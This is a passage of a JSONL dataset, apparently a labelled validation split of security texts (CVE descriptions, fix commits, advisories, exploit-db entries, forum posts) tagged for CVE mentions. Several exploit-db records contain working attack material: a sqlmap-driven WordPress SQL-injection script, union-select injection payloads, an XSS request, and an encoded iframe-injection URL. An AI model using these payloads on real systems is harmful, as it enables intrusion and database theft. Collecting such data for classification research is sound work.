user temporary files. This vulnerability allows one user to run code as another on the same machine. All users are advised to upgrade.'}]\n\nFix commit: Merge pull request from GHSA-pq7m-3gw7-gq5x\n\nFIX CVE-2022-21699", "source": "cvefixes", "timestamp": "2022-01-19", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "de43c459b253c1a81511", "text": "CVE: CVE-2022-23568\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `AddManySparseToTensorsMap` is vulnerable to an integer overflow which results in a `CHECK`-fail when building new `TensorShape` objects (so, an assert failure based denial of service). We are missing some validation on the shapes of the input tensors as well as directly constructing a large `TensorShape` with user-provided dimensions. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Add missing validation to `AddManySparseToTensorsMap`.\n\nSparse tensors have a set of requirements for the 3 components and not all of them were checked.\n\nPiperOrigin-RevId: 415358027\nChange-Id: I96cbb672999cd1da772c22fabbd15507e32e12dc", "source": "cvefixes", "timestamp": "2022-02-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2a1878ddca09607fa9aa", "text": "CVE: CVE-2022-1537\n\n[{'lang': 'en', 'value': \"file.copy operations in GruntJS are vulnerable to a TOCTOU race condition leading to arbitrary file write in GitHub repository gruntjs/grunt prior to 1.5.3. This vulnerability is capable of arbitrary file writes which can lead to local privilege escalation to the GruntJS user if a lower-privileged user has write access to both source and destination directories as the lower-privileged user can create a symlink to the GruntJS user's .bashrc file or replace /etc/shadow file if the GruntJS user is root.\"}]\n\nFix commit: Patch up race condition in symlink copying.", "source": "cvefixes", "timestamp": "2022-05-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "39729e40c726cf98e131", "text": "WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated)\n\n# Exploit Title: WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated)\n# Date 18.02.2022\n# Exploit Author: Ron Jost (Hacker5preme)\n# Vendor Homepage: https://www.getperfectsurvey.com/\n# Software Link: https://web.archive.org/web/20210817031040/https://downloads.wordpress.org/plugin/perfect-survey.1.5.1.zip\n# Version: < 1.5.2\n# Tested on: Ubuntu 20.04\n# CVE: CVE-2021-24762\n# CWE: CWE-89\n# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24762/README.md\n\n'''\nDescription:\nThe Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before\nusing it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.\n'''\n\nbanner = '''\n\n ___ _ _ ______ ____ ____ ____ ___ ____ _ _ _______ _____ ____\n _(___)_ (_) (_)(______) _(____) (____) _(____) (___) _(____)(_) (_)(_______)(_____) _(____)\n(_) (_)(_) (_)(_)__ ______(_) _(_)(_) (_)(_) _(_)(_)(_) ______(_) _(_)(_)__(_)_ _(_)(_)___ (_) _(_)\n(_) _ (_) (_)(____)(______) _(_) (_) (_) _(_) (_)(______) _(_) (________)_(_) (_____)_ _(_)\n(_)___(_) (_)_(_) (_)____ (_)___ (_)__(_) (_)___ (_) (_)___ (_) (_) (_)___(_)(_)___\n (___) (___) (______) (______) (____) (______) (_) (______) (_)(_) (_____)(______)\n\n\n\t\t\t\t\t\t\t\t[+] Perfect Survey - SQL Injection\n\t\t\t\t\t\t\t\t[@] Developed by Ron Jost (Hacker5preme)\n\n'''\nprint(banner)\n\nimport argparse\nfrom datetime import datetime\nimport os\n\n# User-Input:\nmy_parser = argparse.ArgumentParser(description= 'Perfect Survey - SQL-Injection (unauthenticated)')\nmy_parser.add_argument('-T', '--IP', type=str)\nmy_parser.add_argument('-P', '--PORT', type=str)\nmy_parser.add_argument('-U', '--PATH', type=str)\nargs = my_parser.parse_args()\ntarget_ip = args.IP\ntarget_port = args.PORT\nwp_path = args.PATH\n\nprint('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))\nprint('[*] Payload for SQL-Injection:')\nexploitcode_url = r'sqlmap \"http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=get_question&question_id=1 *\" '\nprint(' Sqlmap options:')\nprint(' -a, --all Retrieve everything')\nprint(' -b, --banner Retrieve DBMS banner')\nprint(' --current-user Retrieve DBMS current user')\nprint(' --current-db Retrieve DBMS current database')\nprint(' --passwords Enumerate DBMS users password hashes')\nprint(' --tables Enumerate DBMS database tables')\nprint(' --columns Enumerate DBMS database table column')\nprint(' --schema Enumerate DBMS schema')\nprint(' --dump Dump DBMS database table entries')\nprint(' --dump-all Dump all DBMS databases tables entries')\nretrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')\nexploitcode = exploitcode_url + retrieve_mode + ' --answers=\"follow=Y\" --batch -v 0'\nos.system(exploitcode)\nprint('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))", "source": "exploitdb", "timestamp": "2022-02-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "a8a09caf8ccb0fc238c9", "text": "CVE: CVE-2022-32547\n\n[{'lang': 'en', 'value': \"In ImageMagick, there is load of misaligned address for type 'double', which requires 8 byte alignment and for type 'float', which requires 4 byte alignment at MagickCore/property.c. Whenever crafted or untrusted input is processed by ImageMagick, this causes a negative impact to application availability or other problems related to undefined behavior.\"}]\n\nFix commit: fix #5033: runtime error: load of misaligned address (#5034)\n\n* fix Division by zero in XMenuWidget() of MagickCore/widget.c\r\n\r\n* Fix memory leak in AnimateImageCommand() of MagickWand/animate.c and DisplayImageCommand() of MagickWand/display.c\r\n\r\n* fix Division by zero in ReadEnhMetaFile() of coders/emf.c\r\n\r\n* Resolve conflicts\r\n\r\n* fix issue: outside the range of representable values of type 'unsigned char' at coders/psd.c:1025\r\n\r\n* fix error: 4e+26 is outside the range of representable values of type 'unsigned long' at coders/pcl.c:299\r\n\r\n* fix #5033:runtime error: load of misaligned address\r\n\r\nCo-authored-by: zhailiangliang ", "source": "cvefixes", "timestamp": "2022-06-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "94a920e9207ad2f83262", "text": "In my case i didn’t use the && because it is interpreted as the GET request parameter. I recommend you try to bypass with another character.", "source": "hackthebox", "timestamp": "2022-08-31", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "109f10c26954f4a4a236", "text": "CVE: CVE-2022-0521\n\n[{'lang': 'en', 'value': 'Access of Memory Location After End of Buffer in GitHub repository radareorg/radare2 prior to 5.6.2.'}]\n\nFix commit: Improve boundary checks to fix oobread segfaults ##crash\n\n* Reported by Cen Zhang via huntr.dev\n* Reproducer: bins/fuzzed/javaoob-havoc.class", "source": "cvefixes", "timestamp": "2022-02-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "1b77863580fd10e251e9", "text": "Improper Access Control in Apache Tomcat\n\n[Severity: HIGH]\n\nApache Tomcat 7.x through 7.0.70 and 8.x through 8.5.4, when the CGI Servlet is enabled, follows RFC 3875 section 4.1.18 and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, aka an \"httpoxy\" issue. NOTE: the vendor states \"A mitigation is planned for future releases of Tomcat, tracked as CVE-2016-5388\"; in other words, this is not a CVE ID for a vulnerability.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "86fbabcb9877d9febd0b", "text": "I checked on Discord and it is a different WMI command, as @hajdarevicedin mentioned. In CLI: wmic OS get SerialNumber In PowerShell: Get-WmiObject -Class Win32_OperatingSystem | select SerialNumber", "source": "hackthebox", "timestamp": "2022-09-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e3e9aacdb4483c7f8cd1", "text": "Possible tools to find malwares responsible for backdoor access, use these tools from your Pentesting menu: 1. rkhunter 2. chkrootkit 3. Lynis 4. ClamAV (optional - install it) These would list all available or active malwares on your system known to Parrot OS .", "source": "parrotsec", "timestamp": "2022-02-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a981d4f21190efdd991b", "text": "AVG Anti Spyware 7.5 - Unquoted Service Path _AVG Anti-Spyware Guard_\n\n# Exploit Title: AVG Anti Spyware 7.5 - Unquoted Service Path\n# Date: 06/07/2023\n# Exploit Author: Idan Malihi\n# Vendor Homepage: https://www.avg.com\n# Software Link: https://www.avg.com/en-ww/homepage#pc\n# Version: 7.5\n# Tested on: Microsoft Windows 10 Pro\n# CVE : CVE-2023-36167\n\n#PoC\n\nC:\\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v \"C:\\Windows\\\\\" | findstr /i /v \"\"\"\nAVG Anti-Spyware Guard AVG Anti-Spyware Guard C:\\Program Files (x86)\\Grisoft\\AVG Anti-Spyware 7.5\\guard.exe Auto\n\nC:\\Users>sc qc \"AVG Anti-Spyware Guard\"\n[SC] QueryServiceConfig SUCCESS\n\nSERVICE_NAME: AVG Anti-Spyware Guard\n TYPE : 10 WIN32_OWN_PROCESS\n START_TYPE : 2 AUTO_START\n ERROR_CONTROL : 1 NORMAL\n BINARY_PATH_NAME : C:\\Program Files (x86)\\Grisoft\\AVG Anti-Spyware 7.5\\guard.exe\n LOAD_ORDER_GROUP :\n TAG : 0\n DISPLAY_NAME : AVG Anti-Spyware Guard\n DEPENDENCIES :\n SERVICE_START_NAME : LocalSystem\n\nC:\\Users>systeminfo\n\nHost Name: DESKTOP-LA7J17P\nOS Name: Microsoft Windows 10 Pro\nOS Version: 10.0.19042 N/A Build 19042\nOS Manufacturer: Microsoft Corporation", "source": "exploitdb", "timestamp": "2023-07-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "4057f0ed0e6baa46010c", "text": "Yeah whenever you have an email from a so-called Parrot Dev, u just need to send and email like suk a dik . It worked for me everytime lol", "source": "parrotsec", "timestamp": "2023-12-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "562b77f9a8762adbddf4", "text": "CVE: CVE-2022-33981\n\n[{'lang': 'en', 'value': 'drivers/block/floppy.c in the Linux kernel before 5.17.6 is vulnerable to a denial of service, because of a concurrency use-after-free flaw after deallocating raw_cmd in the raw_cmd_ioctl function.'}]\n\nFix commit: floppy: disable FDRAWCMD by default\n\nMinh Yuan reported a concurrency use-after-free issue in the floppy code\nbetween raw_cmd_ioctl and seek_interrupt.\n\n[ It turns out this has been around, and that others have reported the\n KASAN splats over the years, but Minh Yuan had a reproducer for it and\n so gets primary credit for reporting it for this fix - Linus ]\n\nThe problem is, this driver tends to break very easily and nowadays,\nnobody is expected to use FDRAWCMD anyway since it was used to\nmanipulate non-standard formats. The risk of breaking the driver is\nhigher than the risk presented by this race, and accessing the device\nrequires privileges anyway.\n\nLet's just add a config option to completely disable this ioctl and\nleave it disabled by default. Distros shouldn't use it, and only those\nrunning on antique hardware might need to enable it.\n\nLink: https://lore.kernel.org/all/000000000000b71cdd05d703f6bf@google.com/\nLink: https://lore.kernel.org/lkml/CAKcFiNC=MfYVW-Jt9A3=FPJpTwCD2PL_ULNCpsCVE5s8ZeBQgQ@mail.gmail.com\nLink: https://lore.kernel.org/all/CAEAjamu1FRhz6StCe_55XY5s389ZP_xmCF69k987En+1z53=eg@mail.gmail.com\nReported-by: Minh Yuan \nReported-by: syzbot+8e8958586909d62b6840@syzkaller.appspotmail.com\nReported-by: cruise k \nReported-by: Kyungtae Kim \nSuggested-by: Linus Torvalds \nTested-by: Denis Efremov \nSigned-off-by: Willy Tarreau \nSigned-off-by: Linus Torvalds ", "source": "cvefixes", "timestamp": "2022-06-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "711f376a4cb7b8258951", "text": "How to get back Maltego tool into Kali machine\n\nI am missing Maltego into my Kali machine, I did update & upgrade and I lost Maltego. Is there any way that I can get back Maltego into my Kali machine? it was the default tool but now it’s missing. anyone who can help, please. thanks.", "source": "hackersploit", "timestamp": "2022-02-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "cdcdd3a147f14d05d37a", "text": "[Insecure Storage of Sensitive Information] Splunk Sensitive Information Disclosure @████████\n\nHi Team,\n\nHope you are doing great.\nI got a domain that contains Splunk Sensitive Information Disclosure @██████████\nPoC:\nhttps://███████/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json\n█████████\n\nSplunk through 7.0.1 allows information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key.\n\nReference:\n - https://nvd.nist.gov/vuln/detail/CVE-2018-11409\n - https://github.com/kofa2002/splunk\n - https://www.exploit-db.com/exploits/44865/\n - http://web.archive.org/web/20211208114213/https://securitytracker.com/id/1041148\n\n## Impact\n\nSplunk Sensitive Information Disclosure\n\n## System Host(s)\n██████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nOpen this link:\nhttps://█████████/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json\n\n## Suggested Mitigation/Remediation Actions", "source": "hackerone", "timestamp": "2023-02-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9df7e24bf1a75e4ca9ef", "text": "Hi can anyone DM on overflown, I already have the exploit localy but doesnt work in the machine", "source": "hackthebox", "timestamp": "2022-03-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "3bd7773dc766a5c73d58", "text": "I’m having trouble getting a reverse shell for flag5. I have the Tomcat username and password, I have tried it with several metasploit methods and nothing, the only thing I have managed is to create a web shell by uploading a file to the tomcat page and from there I got the flag4, but I can’t find the way to get a reverse shell. Any ideas?", "source": "hackthebox", "timestamp": "2022-12-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "cec244e1e81e546977c1", "text": "Art Gallery Management System Project v1.0 - SQL Injection (cid) Unauthenticated\n\n# Exploit Title: Art Gallery Management System Project v1.0 - SQL Injection (cid) Unauthenticated\n# Date: 20/01/2023\n# Exploit Author: Rahul Patwari\n# Vendor Homepage: https://phpgurukul.com/\n# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip\n# Version: 1.0\n# Tested on: XAMPP / Windows 10\n# CVE : CVE-2023-23162\n\n# Proof of Concept:\n\n# 1- Install The application Art Gallery Management System Project v1.0\n# 2- Navigate to the product page by clicking on the \"ART TYPE\" by selecting any of the categories on the menu.\n# 3- Now insert a single quote ( ' ) on \"cid\" parameter to break the database query, you will see the output is not shown.\n# 4- Now inject the payload double single quote ('') in the \"cid\" parameter to merge the database query and after sending this request the SQL query is successfully performed and the product is shown in the output.\n# 5- Now find how many columns are returned by the SQL query. this query will return 6 columns.\n Payload:cid=1%27order%20by%206%20--%20-&artname=Sculptures\n\n# 6- for manually getting data from the database insert the below payload to see the user of the database.\n payload: cid=-2%27union%20select%201,2,3,user(),5,6--%20-&artname=Serigraphs\n\n# 7- for automation using \"SQLMAP\" intercept the request and copy this request to a file called \"request.txt\".\n# 8- now to get all database data use the below \"sqlmap\" command to fetch all the data.\n Command: sqlmap -r request.txt -p cid --dump-all --batch\n\n# Go to this url \"\nhttps://localhost.com/Art-Gallery-MS-PHP/product.php?cid=-2%27union%20select%201,2,3,user(),5,6--%20-&artname=Serigraphs\n\"", "source": "exploitdb", "timestamp": "2023-04-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "da9c80cc1869f3a775a0", "text": "Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)\n\n# Exploit Title: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)\n# Date: 1/3/2022\n# Exploit Author: Momen Eldawakhly (CyberGuy)\n# Vendor Homepage: https://www.zyxel.com\n# Version: ZyWALL 2 Plus\n# Tested on: Ubuntu Linux [Firefox]\n# CVE : CVE-2021-46387\n\nGET /Forms/rpAuth_1?id=%3C/form%3E%3CiMg%20src=x%20onerror=%22prompt(1)%22%3E%3Cform%3E HTTP/1.1\nHost: vuln.ip:8080\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1", "source": "exploitdb", "timestamp": "2022-03-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9fcd5acb74d21813db07", "text": "There are various security settings on a DNS server. Among other things, you can specify whether a zone transfer should be allowed for all servers or only for certain servers (allow-transfer). If a zone transfer is allowed, you can transfer the zone with “dig axfr”. If the zone transfer is not allowed, you have to bruteforce the zone. Hint: Start with the smallest list.", "source": "hackthebox", "timestamp": "2022-02-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "98f35e866c7f932b74f9", "text": "interssting to change the mac adress. the best I guess is to buy a new laptop phone with a prepaid 4g internet connection. then use linux with proxychains that use tor connection and change also your dns. But you are right I didn’t think of changing your mac adress.", "source": "hackersploit", "timestamp": "2022-07-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "b55f01886a2494c42de7", "text": "Stored XSS using uppercase characters in HTMLEditor\n\n[Severity: MEDIUM]\n\nA malicious content author could add a Javascript payload to the href attribute of a link. A similar issue was identified and fixed via CVE-2022-28803. However, the fix didn't account for the casing of the href attribute. An attacker must have access to the CMS to exploit this issue.", "source": "github_advisory", "timestamp": "2022-11-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "49ba57d7290e51127729", "text": "Processor instruction emulation\n\nGood day, Recently found out that CPU instruction \"kmovd\" from AVX512BW set is successfully executed on windows 10,(even on Sandy Bridge CPU). But same instruction with same arguments throws exception \"Illegal instruction\" on Windows 7 SP1 x64. I installed all updates(270+ at the moment), installed all VC packs x64 and x86 up to 2005 versions. But exception persists. Can this be solved by upgrading or installing some virtualization update for Windows?", "source": "go4expert", "timestamp": "2022-09-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "064be52e26870e0ae676", "text": "Stuck for a few days at Elasticity. I’m pretty sure I’m aiming at the correct ports locally but it keeps timing out. Please DM me if you have a pointer or two", "source": "hackthebox", "timestamp": "2023-03-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "7254bda5b312e27ca88c", "text": "I will give my contribution to this exercise because it is extremely poorly formulated, causing huge problems with the construction of the usernames and password lists. There it goes: Install username-anarchy using the command: git clone GitHub - urbanadventurer/username-anarchy: Username tools for penetration testing (something that should already be installed in pwnbox) Enter the username-anarchy folder and create a usernames list using the command .username-anarchy user > user.txt (change user for the user you used in the past, “it’s already clear here on the forum”). Save the list as usernames.txt Create a password list. Start cupp and put only the character’s first name (the first line). Also includes add special characters and l33t mode. Run hydra by passing the list of usernames and passwords you created with the command you leared in the last few lessons. The user is something like (****.*****). Use usernames.txt and the passwords.txt that you did. Don’t forget to use -u and -f flags. The ftp part is just the same steps as in the Service Authentication Brute Forcing lesson. I hope the hack the box team create more explanatory exercises, as the learning material is very good, but spending hours and hours running a list of words to finish an exercise is sad.", "source": "hackthebox", "timestamp": "2022-04-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "5183635d4a54a6b31356", "text": "CVE: CVE-2022-23561\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. An attacker can craft a TFLite model that would cause a write outside of bounds of an array in TFLite. In fact, the attacker can override the linked list used by the memory allocator. This can be leveraged for an arbitrary write primitive under certain conditions. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: [lite] add validation check for sparse fully connected\n\nPiperOrigin-RevId: 417629354\nChange-Id: If96171c4bd4f5fdb01d6368d6deab19d1c9beca7", "source": "cvefixes", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "109b42120f9d740b2288", "text": "STARFACE 7.3.0.10 - Authentication with Password Hash Possible\n\nExploit Title: STARFACE 7.3.0.10 - Authentication with Password Hash Possible\nAffected Versions: 7.3.0.10 and earlier versions\nFixed Versions: -\nVulnerability Type: Broken Authentication\nSecurity Risk: low\nVendor URL: https://www.starface.de\nVendor Status: notified\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2022-004\nAdvisory Status: published\nCVE: CVE-2023-33243\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33243\n\n\nIntroduction\n============\n\n\"When functionality and comfort come together, the result is a\nstate-of-the-art experience that we've dubbed 'comfortphoning'. It's a\nsecure, scalable digital communication solution that meets every need\nand wish. STARFACE is easy to integrate into existing IT systems and\nflexibly grows with your requirements.\"\n\n(from the vendor's homepage)\n\n\nMore Details\n============\n\nThe image of STARFACE PBX [0] in version 7.3.0.10 can be downloaded from\nthe vendor's homepage [1]. The included files can be further examined by\neither extracting the contents or running the image in a virtual\nmachine. The web interface of the PBX uses the JavaScript file at the\nfollowing path to submit the login form:\n\n------------------------------------------------------------------------\njs/prettifier.js\n------------------------------------------------------------------------\n\nThe following two lines of the JavaScript file \"prettifier.js\" add the\ntwo parameters \"secret\" and \"ack\" to the form before being submitted:\n\n------------------------------------------------------------------------\n$form(document.forms[0]).add('secret', createHash(defaultVals.isAd, liv, lpv, defaultVals.k + defaultVals.bk));\n$form(document.forms[0]).add('ack', defaultVals.k);\n------------------------------------------------------------------------\n\nThe JavaScript object \"defaultVals\" is included in the web application's\nsource text. While the value of \"defaultVals.k\" was found to be the\nstatic hash of the PBX version, the value of \"defaultVals.bk\" contains a\nnonce only valid for the currently used session. Therefore, the form\nparameter \"ack\" is always the same value. For the form value \"secret\"\nthe function \"createHash()\" is called with different arguments. The\nvalue of \"defaultVals.isAd\" is set to \"false\" when login via Active\nDirectory is disabled. The parameters \"liv\" and \"lpv\" contain the\nusername and password entered into the form respectively.\n\n------------------------------------------------------------------------\nconst createHash = function (isAD, user, pass, nonces) {\n if (isAD) {\n return forAD.encode(user + nonces + pass);\n }\n return user + ':' + forSF(user + nonces + forSF(pass));\n};\n------------------------------------------------------------------------\n\nThe expression right after the second return statement is the\nimplementation used when Active Directory login is disabled which is the\ndefault setting. The return value is composed of the username separated\nvia a colon from a value built using the \"forSF()\" function. The\n\"forSF()\" function was found to calculate the SHA512 hash value. When\nconsidering the arguments passed to the function, the hash is calculated\nas follows:\n\n------------------------------------------------------------------------\nSHA512(username + defaultVals.k + defaultVals.bk + SHA512(password))\n------------------------------------------------------------------------\n\nAs can be seen, instead of the cleartext password the SHA512 hash of the\npassword is used in the calculation. In conclusion, for the form value\n\"secret\" the following value is transmitted:\n\n------------------------------------------------------------------------\nusername + \":\" + SHA512(\n username + defaultVals.k + defaultVals.bk + SHA512(password)\n)\n------------------------------------------------------------------------\n\nIf the SHA512 hash of a user's password is known, it can be directly\nused in the calculation of the \"secret\" during the login process.\nKnowledge of the cleartext password is not required.\n\nThis finding was al", "source": "exploitdb", "timestamp": "2023-06-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "015c19133a86ef777f8a", "text": "CVE: CVE-2022-29251\n\n[{'lang': 'en', 'value': 'XWiki Platform Flamingo Theme UI is a tool that allows customization and preview of any Flamingo-based skin. Starting with versions 6.2.4 and 6.3-rc-1, a possible cross-site scripting vector is present in the `FlamingoThemesCode.WebHomeSheet` wiki page related to the \"newThemeName\" form field. The issue is patched in versions 12.10.11, 14.0-rc-1, 13.4.7, and 13.10.3. The easiest available workaround is to edit the wiki page `FlamingoThemesCode.WebHomeSheet` (with wiki editor) according to the suggestion provided in the GitHub Security Advisory.'}]\n\nFix commit: XWIKI-19294: Fix bad escaping", "source": "cvefixes", "timestamp": "2022-05-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "90742b3552a37a24ca75", "text": "If I am not misunderstanding, that may require you to change the codebase that powers the car. There is a possibility that the car you are targeting may have code written in C, C++ and Assembly.", "source": "parrotsec", "timestamp": "2023-01-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "7bb134ed1365ae5d09fd", "text": "Wordpress Plugin Elementor 3.5.5 - Iframe Injection\n\n# Exploit Title: Wordpress Plugin Elementor < 3.5.5 - Iframe Injection\n# Date: 28.08.2023\n# Exploit Author: Miguel Santareno\n# Vendor Homepage: https://elementor.com/\n# Version: < 3.5.5\n# Tested on: Google and Firefox latest version\n# CVE : CVE-2022-4953\n\n# 1. Description\nThe plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.\n\n\n# 2. Proof of Concept (PoC)\nProof of Concept:\nhttps://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K", "source": "exploitdb", "timestamp": "2023-09-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "eb3926aad6313695dd0d", "text": "CVE: CVE-2022-2339\n\n[{'lang': 'en', 'value': \"With this SSRF vulnerability, an attacker can reach internal addresses to make a request as the server and read it's contents. This attack can lead to leak of sensitive information.\"}]\n\nFix commit: Merge pull request #2495 from nocodb/develop\n\nPre-release 0.92.0", "source": "cvefixes", "timestamp": "2022-07-07", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "7beebebed0831ebe5ce0", "text": "[Business Logic Errors] CVE-2023-27538: SSH connection too eager reuse still\n\nlibcurl would reuse a previously created connection even when an SSH related option had been changed that should have prohibited reuse.\n\nlibcurl keeps previously used connections in a connection pool for subsequent transfers to reuse if one of them matches the setup. However, two SSH settings were left out from the configuration match checks, making them match too easily.\n\n## Hackerone report\n#1898475\n\n## Impact\n\nConnection reuse when different ssh keys are specified.", "source": "hackerone", "timestamp": "2023-04-19", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "5d2ca3544c1156cb75f4", "text": "CVE: CVE-2022-0913\n\n[{'lang': 'en', 'value': 'Integer Overflow or Wraparound in GitHub repository microweber/microweber prior to 1.3.'}]\n\nFix commit: checkout shipping address validation - max chars allowed", "source": "cvefixes", "timestamp": "2022-03-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "b2f2ebf7a0c9d04e0c58", "text": "Ansible password prompts could expose passwords\n\n[Severity: HIGH]\n\nA data disclosure flaw was found in ansible. Password prompts in ansible-playbook and ansible-cli tools could expose passwords with special characters as they are not properly wrapped. A password with special characters is exposed starting with the first of these special characters. The highest threat from this vulnerability is to data confidentiality.\n\nThis CVE exists due to an incomplete fix for CVE-2019-10206.", "source": "github_advisory", "timestamp": "2022-05-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ca8e7e01f5d92f4b156b", "text": "Hi MunAsqah, I have spent a week on this. could you please help me with the last question about DNS lab. thanks", "source": "hackthebox", "timestamp": "2023-02-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "65816ffd21f992a2f48a", "text": "CVE: CVE-2022-31093\n\n[{'lang': 'en', 'value': 'NextAuth.js is a complete open source authentication solution for Next.js applications. In affected versions an attacker can send a request to an app using NextAuth.js with an invalid `callbackUrl` query parameter, which internally is converted to a `URL` object. The URL instantiation would fail due to a malformed URL being passed into the constructor, causing it to throw an unhandled error which led to the **API route handler timing out and logging in to fail**. This has been remedied in versions 3.29.5 and 4.5.0. If for some reason you cannot upgrade, the workaround requires you to rely on Advanced Initialization. Please see the documentation for more.'}]\n\nFix commit: test: add test for invalid `callbackUrl` handling", "source": "cvefixes", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "8bd5790f4791a7c702e9", "text": "Hi i`ve been reading this topic in order to answer 3 questions: How many files exist on the system that have the “.bak” file extension? How many files exist on the system that have the “.log” file extension? How many total packages are installed on the target system? So i use this commands: find / -name “*.bak” 2>/dev/null | wc -l find / -name “*.log” 2>/dev/null | wc -l apt list --installed | wc -l The results of the output are: 1 136 3602 The 3 results are incorrect answers… i dont understand what is wrong, can sombody help me? I know the answer for question number 1 is 4 by reading this topic but i can only obtein 1 as an output.", "source": "hackthebox", "timestamp": "2022-01-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "deccee3f5cd1a572ad33", "text": "Make sure you’ve identified ALL of the vulnerable applications on the box…one of them will give you what you want…don’t just focus on the one thing", "source": "hackthebox", "timestamp": "2022-01-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "5b6c09f88e4dff98fbf5", "text": "Information Exposure in Apache Tapestry\n\n[Severity: HIGH]\n\nInformation Exposure vulnerability in context asset handling of Apache Tapestry allows an attacker to download files inside WEB-INF if using a specially-constructed URL. This was caused by an incomplete fix for CVE-2020-13953. This issue affects Apache Tapestry Apache Tapestry 5.4.0 version to Apache Tapestry 5.6.3; Apache Tapestry 5.7.0 version and Apache Tapestry 5.7.1.", "source": "github_advisory", "timestamp": "2022-03-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2d425b09b1b0deeda0d3", "text": "I went ahead and followed you but Im unsure how to send an invite for the team… If you send a “join request” ill accept and then follow up with the team discord.", "source": "hackthebox", "timestamp": "2022-09-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": 